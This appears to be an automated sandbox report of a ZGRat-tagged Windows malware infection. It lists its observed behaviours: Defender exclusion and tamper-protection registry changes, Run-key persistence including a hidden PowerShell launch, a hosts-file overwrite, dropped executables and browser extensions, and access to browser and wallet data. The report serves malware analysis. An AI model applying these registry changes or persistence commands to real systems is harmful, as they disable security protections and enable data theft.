Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSAD14.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\F78F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F899.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FA41.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FAFE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FC66.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9B66.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9F9D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A1B2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSA97A.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSAD14.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E572.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EECA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\AMszdPP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 51.159.66.125 N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\FAFE.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\FAFE.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\9F9D.exe'\"" C:\Users\Admin\AppData\Local\Temp\9F9D.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\F78F.exe N/A

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSAD14.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\System32\Conhost.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\reg.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\AMszdPP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\AMszdPP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\MyBurn\is-K4EGH.tmp C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-RF4OE.tmp C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File created C:\Program Files (x86)\MyBurn\is-JEB8Q.tmp C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-6QBHA.tmp C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\zmgfJgY.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File created C:\Program Files (x86)\KrPQunXfXpAVC\XkbSAqs.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-U3O6N.tmp C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp N/A
File created C:\Program Files (x86)\DlbZONUGhjVU2\egkYJiN.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-RVLVI.tmp C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File created C:\Program Files (x86)\oVhJPNkDU\KwQOyyo.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File created C:\Program Files (x86)\MyBurn\is-05REN.tmp C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Program Files (x86)\DlbZONUGhjVU2\dsVbgRqitlvYr.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File created C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-21N16.tmp C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp N/A
File opened for modification C:\Program Files (x86)\MyBurn\MyBurn.exe C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp N/A
File created C:\Program Files (x86)\oVhJPNkDU\sbRilY.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File created C:\Program Files (x86)\KrPQunXfXpAVC\grvrNTS.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File created C:\Program Files (x86)\GpfcWYRxKqUn\VIzsfXZ.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File created C:\Program Files (x86)\MyBurn\is-M6JCB.tmp C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp N/A
File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\NkfDFkS.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\A1B2.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\GyWbuVQzPmDmgkCMH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
